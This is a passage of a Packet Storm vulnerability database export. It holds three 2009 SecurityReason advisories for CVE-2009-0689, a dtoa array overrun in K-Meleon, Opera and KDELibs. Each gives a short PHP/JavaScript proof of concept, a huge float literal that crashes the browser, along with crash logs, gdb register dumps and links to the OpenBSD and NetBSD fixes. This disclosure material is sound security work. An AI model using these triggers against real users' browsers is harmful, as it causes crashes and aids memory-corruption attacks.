Overrun (Arbitrary code execution) ] \n \nAuthor: Maksymilian Arciemowicz and sp3x \nhttp://SecurityReason.com \nDate: \n- - Dis.: 07.05.2009 \n- - Pub.: 20.11.2009 \n \nCVE: CVE-2009-0689 \nRisk: High \nRemote: Yes \n \nAffected Software: \n- - K-Meleon 1.5.3 \n \nNOTE: Prior versions may also be affected. \n \nOriginal URL: \nhttp://securityreason.com/achievement_securityalert/72 \n \n \n- --- 0.Description --- \nK-Meleon is an extremely fast, customizable, lightweight web browser \nbased on the Gecko layout engine developed by Mozilla which is also used \nby Firefox. K-Meleon is free, open source software released under the \nGNU General Public License and is designed specifically for Microsoft \nWindows (Win32) operating systems. \n \n \n- --- 1. K-Meleon 1.5.3 Remote Array Overrun (Arbitrary code execution) --- \nThe main problem exist in dtoa implementation. K-Meleon has the same \ndtoa as a KDE, Opera and all BSD systems. This issue has been fixed in \nFirefox 3.5.4 and fix \n \nhttp://securityreason.com/achievement_securityalert/63 \n \nbut fix for SREASONRES:20090625, used by openbsd was not good. \nMore information about fix for openbsd and similars SREASONRES:20091030, \n \nhttp://securityreason.com/achievement_securityalert/69 \n \nWe can create any number of float, which will overwrite the memory. In \nKmax has defined 15. Functions in dtoa, don't checks Kmax limit, and it \nis possible to call 16<= elements of freelist array. \n \n \n- --- 2. Proof of Concept (PoC) --- \n \n- ----------------------- \n<script> \nvar a=0.<?php echo str_repeat(\"1\",296450); ?>; \n</script> \n- ----------------------- \n \nK-Meleon will crash with \n \nUnhandled exception at 0x01800754 in k-meleon.exe: 0xC0000005: Access \nviolation reading location 0x0bc576ec. \n \n01800754 mov eax,dword ptr [ecx] \n \nEAX 00000002 \nECX 0BC576EC \nEDI 028FEB51 \n \n \n- --- 3. SecurityReason Note --- \n \nOfficialy SREASONRES:20090625 has been detected in: \n- - OpenBSD \n- - NetBSD \n- - FreeBSD \n- - MacOSX \n- - Google Chrome \n- - Mozilla Firefox \n- - Mozilla Seamonkey \n- - KDE (example: konqueror) \n- - Opera \n- - K-Meleon \n \nThis list is not yet closed. US-CERT declared that will inform all \nvendors about this issue, however, they did not do it. Even greater \nconfusion caused new CVE number \"CVE-2009-1563\". Secunia has informed \nthat this vulnerability was only detected in Mozilla Firefox, but nobody \nwas aware that the problem affects other products like ( KDE, Chrome ) \nand it is based on \"CVE-2009-0689\". After some time Mozilla Foundation \nSecurity Advisory \n(\"http://www.mozilla.org/security/announce/2009/mfsa2009-59.html\") \nwas updated with note : \n\"The underlying flaw in the dtoa routines used by Mozilla appears to be \nessentially the same as that reported against the libc gdtoa routine by \nMaksymilian Arciemowicz ( CVE-2009-0689)\". \nThis fact ( new CVE number for Firefox Vulnerability )and PoC in \njavascript (from Secunia), forced us to official notification all other \nvendors. We publish all the individual advisories, to formally show all \nvulnerable software and to avoid wrong CVE number. We do not see any \nother way to fix this issue in all products. \n \nPlease note: \nPatch used in Firefox 3.5.4 does not fully solve the problem. Dtoa \nalgorithm is not optimal and allows remote Denial of Service in Firefox \n3.5.5 giving long float number. \n \n \n- --- 4. Fix --- \nNetBSD fix (optimal): \nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h \n \nOpenBSD fix: \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c \n \n \n- --- 5. Credits --- \nDiscovered by Maksymilian Arciemowicz and sp3x from SecurityReason.com. \n \n \n- --- 6. Greets --- \nInfospec p_e_a pi3 \n \n \n- --- 7. Contact --- \nEmail: \n- - cxib {a.t] securityreason [d0t} com \n- - sp3x {a.t] securityreason [d0t} com \n \nGPG: \n- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg \n- - http://securityreason.com/key/sp3x.gpg \n \nhttp://securityreason.com/ \nhttp://securityreason.pl/ \n \n \n-----BEGIN PGP SIGNATURE----- \n \niEYEARECAAYFAksF4ZoACgkQpiCeOKaYa9bJsACgqjmxJmR9BORNOK3YhNUeyz+o \nl8EAn2V+5mXH7GLWp+btWMf+4fGDeIzw \n=Zqoe \n-----END PGP SIGNATURE----- \n \n`\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/82822/kmeleon-overrun.txt"}, {"lastseen": "2016-12-05T22:13:36", "description": "", "published": "2009-11-20T00:00:00", "type": "packetstorm", "title": "Opera 10.01 Remote Array Overrun", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-1563", "CVE-2009-0689"], "modified": "2009-11-20T00:00:00", "id": "PACKETSTORM:82823", "href": "https://packetstormsecurity.com/files/82823/Opera-10.01-Remote-Array-Overrun.html", "sourceData": "`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n \n[ Opera 10.01 Remote Array Overrun (Arbitrary code execution) ] \n \nAuthor: Maksymilian Arciemowicz and sp3x \nhttp://SecurityReason.com \nDate: \n- - Dis.: 07.05.2009 \n- - Pub.: 20.11.2009 \n \nCVE: CVE-2009-0689 \nRisk: High \nRemote: Yes \n \nAffected Software: \n- - Opera 10.01 \n- - Opera 10.10 Beta \n \nNOTE: Prior versions may also be affected. \n \nOriginal URL: \nhttp://securityreason.com/achievement_securityalert/73 \n \n \n- --- 0.Description --- \nOpera is a Web browser and Internet suite developed by the Opera \nSoftware company. The browser handles common Internet-related tasks such \nas displaying Web sites, sending and receiving e-mail messages, managing \ncontacts, IRC online chatting, downloading files via BitTorrent, and \nreading Web feeds. Opera is offered free of charge for personal \ncomputers and mobile phones. \n \n \n- --- 1. Opera 10.01 Remote Array Overrun (Arbitrary code execution) --- \nThe main problem exist in dtoa implementation. Opera has a very similar \ndtoa algorithm to the BSD, Chrome and Mozilla products. It is the same \nissue like SREASONRES:20090625. \n \nhttp://securityreason.com/achievement_securityalert/63 \n \nbut fix for SREASONRES:20090625, used by openbsd was not good. \nMore information about fix for openbsd and similars SREASONRES:20091030, \n \nhttp://securityreason.com/achievement_securityalert/69 \n \nWe can create any number of float, which will overwrite the memory. In \nKmax has defined 15. Functions in dtoa, don't checks Kmax limit, and it \nis possible to call 16<= elements of freelist array. \n \n \n- --- 2. Proof of Concept (PoC) --- \n \n- ----------------------- \n<script> \nvar a=0.<?php echo str_repeat(\"9\",299999); ?>; \n</script> \n- ----------------------- \n \nIf we use Opera to see this PoC, Opera will crash. For example \n \n- ----------------------- \n<script> \nvar a=0.<?php echo str_repeat(\"1\",296450); ?>; \n</script> \n- ----------------------- \n \nOPERA-CRASHLOG V1 desktop 10.01 1844 windows \nOpera.exe 1844 caused exception C0000005 at address 67956906 (Base: 400000) \n \nRegisters: \nEAX=01165C40 EBX=0592064C ECX=A0D589D4 EDX=42000000 ESI=C20471EC \nEDI=00000000 EBP=0012E384 ESP=0012E2FC EIP=67956906 FLAGS=00010202 \nCS=001B DS=0023 SS=0023 ES=0023 FS=003B GS=0000 \nFPU stack: \nC020A38F66534266F000 C020A38F66534266F000 3FFBE38E38E38E38D800 \n3FC78000000000000000 10000000000100000000 0BBE0000000000040000 \n00000000000000000000 2EBA804E2FDE00000000 SW=0122 CW=027F \n \n127# gdb -q opera opera.core \n... \nProgram terminated with signal 11, Segmentation fault. \n#0 0x2960307b in ?? () \n... \n(gdb) i r \neax 0x71c71c71 1908874353 \necx 0x2aa03be4 715144164 \nedx 0x0 0 \nebx 0x296177f8 694253560 \nesp 0xbfbfb650 0xbfbfb650 \nebp 0xbfbfb698 0xbfbfb698 \nesi 0x2962d000 694341632 \nedi 0x0 0 \neip 0x2960307b 0x2960307b \n... \n(gdb) x/100x ($esi)-90 \n0x2962cfa6: 0x71c71c71 0x1c71c71c 0xc71c71c7 0x71c71c71 \n0x2962cfb6: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c \n0x2962cfc6: 0xc71c71c7 0x71c71c71 0x1c71c71c 0xc71c71c7 \n0x2962cfd6: 0x71c71c71 0x1c71c71c 0xc71c71c7 0x71c71c71 \n0x2962cfe6: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c \n0x2962cff6: 0xc71c71c7 0x71c71c71 Cannot access memory at \naddress 0x2962cffe \n... \n \n \n- --- 3. SecurityReason Note --- \n \nOfficialy SREASONRES:20090625 has been detected in: \n- - OpenBSD \n- - NetBSD \n- - FreeBSD \n- - MacOSX \n- - Google Chrome \n- - Mozilla Firefox \n- - Mozilla Seamonkey \n- - KDE (example: konqueror) \n- - Opera \n- - K-Meleon \n \nThis list is not yet closed. US-CERT declared that will inform all \nvendors about this issue, however, they did not do it. Even greater \nconfusion caused new CVE number \"CVE-2009-1563\". Secunia has informed \nthat this vulnerability was only detected in Mozilla Firefox, but nobody \nwas aware that the problem affects other products like ( KDE, Chrome ) \nand it is based on \"CVE-2009-0689\". After some time Mozilla Foundation \nSecurity Advisory \n(\"http://www.mozilla.org/security/announce/2009/mfsa2009-59.html\") \nwas updated with note : \n\"The underlying flaw in the dtoa routines used by Mozilla appears to be \nessentially the same as that reported against the libc gdtoa routine by \nMaksymilian Arciemowicz ( CVE-2009-0689)\". \nThis fact ( new CVE number for Firefox Vulnerability )and PoC in \njavascript (from Secunia), forced us to official notification all other \nvendors. We publish all the individual advisories, to formally show all \nvulnerable software and to avoid wrong CVE number. We do not see any \nother way to fix this issue in all products. \n \n \n- --- 4. Fix --- \nOpera fix: \nThe vulnerability was fixed in the latest release candidate Opera RC3 : \nhttp://snapshot.opera.com/windows/Opera_1010_1890_in.exe \nIn shortly time we can expect the final verion of Opera with the fix. \n \nNetBSD fix (optimal): \nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h \n \nOpenBSD fix: \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c \n \n \n- --- 5. Credits --- \nDiscovered by Maksymilian Arciemowicz and sp3x from SecurityReason.com. \n \n \n- --- 6. Greets --- \nInfospec p_e_a pi3 \n \n \n- --- 7. Contact --- \nEmail: \n- - cxib {a.t] securityreason [d0t} com \n- - sp3x {a.t] securityreason [d0t} com \n \nGPG: \n- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg \n- - http://securityreason.com/key/sp3x.gpg \n \nhttp://securityreason.com/ \nhttp://securityreason.pl/ \n \n-----BEGIN PGP SIGNATURE----- \n \niEYEARECAAYFAksF4esACgkQpiCeOKaYa9bOkQCcDLKKqvSyE1ZJZebhBBiow8tV \nXqQAnR79bagErDfzJ3TV/MlLgrWXsGD7 \n=/IkD \n-----END PGP SIGNATURE----- \n \n`\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/82823/opera-overrun.txt"}, {"lastseen": "2016-12-05T22:11:28", "description": "", "published": "2009-11-20T00:00:00", "type": "packetstorm", "title": "KDELibs 4.3.3 Remote Array Overrun", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-1563", "CVE-2009-0689"], "modified": "2009-11-20T00:00:00", "id": "PACKETSTORM:82824", "href": "https://packetstormsecurity.com/files/82824/KDELibs-4.3.3-Remote-Array-Overrun.html", "sourceData": "`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n \n[ KDE KDELibs 4.3.3 Remote Array Overrun (Arbitrary code execution) ] \n \nAuthor: Maksymilian Arciemowicz and sp3x \nhttp://SecurityReason.com \nDate: \n- - Dis.: 07.05.2009 \n- - Pub.: 20.11.2009 \n \nCVE: CVE-2009-0689 \nRisk: High \nRemote: Yes \n \nAffected Software: \n- - KDELibs 4.3.3 \n \nNOTE: Prior versions may also be affected. \n \nOriginal URL: \nhttp://securityreason.com/achievement_securityalert/74 \n \n \n- --- 0.Description --- \nKDELibs is a collection of libraries built on top of Qt that provides \nframeworks and functionality for developers of KDE-compatible software. \nThe KDELibs libraries are licensed under LGPL. \n \n \n- --- 1. KDE KDELibs 4.3.2 Remote Array Overrun (Arbitrary code \nexecution) --- \nThe main problem exist in dtoa implementation. KDE has a very similar \ndtoa algorithm to the BSD, Chrome and Mozilla products. Problem exist \nin dtoa.cpp file \n \nhttp://websvn.kde.org/tags/KDE/4.3.3/kdelibs/kjs/dtoa.cpp?revision=1042584&view=markup \n \nand it is the same like SREASONRES:20090625. \n \nhttp://securityreason.com/achievement_securityalert/63 \n \nbut fix for SREASONRES:20090625, used by openbsd was not good. \nMore information about fix for openbsd and similars SREASONRES:20091030, \n \nhttp://securityreason.com/achievement_securityalert/69 \n \nWe can create any number of float, which will overwrite the memory. In \nKmax has defined 15. Functions in dtoa, don't checks Kmax limit, and \nit is possible to call 16<= elements of freelist array. \n \n \n- --- 2. Proof of Concept (PoC) --- \n \n- ----------------------- \n<script> \nvar a=0.<?php echo str_repeat(\"9\",299999); ?>; \n</script> \n- ----------------------- \n \nIf we use konqueror to see this PoC, konqueror will crash. For example \n \n- ----------------------- \n<script> \nvar a=0.<?php echo str_repeat(\"1\",296450); ?>; \n</script> \n- ----------------------- \n \nProgram received signal SIGSEGV, Segmentation fault. \n[Switching to process 24845, thread 0x7e6e6800] \n0x090985c3 in diff () from /usr/local/lib/libkjs.so.5.0 \n \n0x06db85c3 <diff+163>: mov %esi,(%ecx) \n \n#0 0x090985c3 in diff () from /usr/local/lib/libkjs.so.5.0 \n#1 0x0909901b in kjs_strtod () from /usr/local/lib/libkjs.so.5.0 \n#2 0x090738e5 in KJS::Lexer::lex () from /usr/local/lib/libkjs.so.5.0 \n#3 0x0907300c in kjsyylex () from /usr/local/lib/libkjs.so.5.0 \n#4 0x09072f86 in kjsyyparse () from /usr/local/lib/libkjs.so.5.0 \n#5 0x090805cf in KJS::Parser::parse () from /usr/local/lib/libkjs.so.5.0 \n#6 0x0908337f in KJS::InterpreterImp::evaluate () \n \n(gdb) i r \neax 0x0 0 \necx 0x220ff000 571469824 \nedx 0x0 0 \nebx 0x220fbb00 571456256 \nesp 0xcfbc04e0 0xcfbc04e0 \nebp 0xcfbc0518 0xcfbc0518 \nesi 0xc71c71c7 -954437177 \nedi 0x0 0 \neip 0x21415c3 0x21415c3 \n \nesi=0x71c71c7 \n \n \n- --- 3. SecurityReason Note --- \n \nOfficialy SREASONRES:20090625 has been detected in: \n- - OpenBSD \n- - NetBSD \n- - FreeBSD \n- - MacOSX \n- - Google Chrome \n- - Mozilla Firefox \n- - Mozilla Seamonkey \n- - KDE (example: konqueror) \n- - Opera \n- - K-Meleon \n \nThis list is not yet closed. US-CERT declared that will inform all \nvendors about this issue, however, they did not do it. Even greater \nconfusion caused new CVE number \"CVE-2009-1563\". Secunia has informed \nthat this vulnerability was only detected in Mozilla Firefox, but nobody \nwas aware that the problem affects other products like ( KDE, Chrome ) \nand it is based on \"CVE-2009-0689\". After some time Mozilla Foundation \nSecurity Advisory \n(\"http://www.mozilla.org/security/announce/2009/mfsa2009-59.html\") \nwas updated with note : \n\"The underlying flaw in the dtoa routines used by Mozilla appears to be \nessentially the same as that reported against the libc gdtoa routine by \nMaksymilian Arciemowicz ( CVE-2009-0689)\". \nThis fact ( new CVE number for Firefox Vulnerability )and PoC in \njavascript (from Secunia), forced us to official notification all other \nvendors. We publish all the individual advisories, to formally show all \nvulnerable software and to avoid wrong CVE number. We do not see any \nother way to fix this issue in all products. \n \n \n- --- 4. Fix --- \nNetBSD fix (optimal): \nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h \n \nOpenBSD fix: \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c \n \n \n- --- 5. Credits --- \nDiscovered by Maksymilian Arciemowicz and sp3x from SecurityReason.com. \n \n \n- --- 6. Greets --- \nInfospec p_e_a pi3 \n \n \n- --- 7. Contact --- \nEmail: \n- - cxib {a.t] securityreason [d0t} com \n- - sp3x {a.t] securityreason [d0t} com \n \nGPG: \n- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg \n- - http://securityreason.com/key/sp3x.gpg \n \nhttp://securityreason.com/ \nhttp://securityreason.pl/ \n \n \n-----BEGIN PGP SIGNATURE----- \n \niEYEARECAAYFAksF4lEACgkQpiCeOKaYa9ZD+ACfSoaEiTeQrFDgtcHgOckyXMom \nTE4AoJW3meP7KP6Xb7KNErVlsluLUO8E \n=jTmp \n-----END PGP SIGNATURE----- \n \n`\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/82824/kdelibs-overrun.txt"}, {"lastseen": "2016-12-05T22:22:59", "description": "", "published": "2009-12-12T00:00:00", "type": "packetstorm", "title": "Camino 1.6.10 Remote Array Overrun", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0689"], "modified": "2009-12-12T00:00:00", "id": "PACKETSTORM:83738", "href": 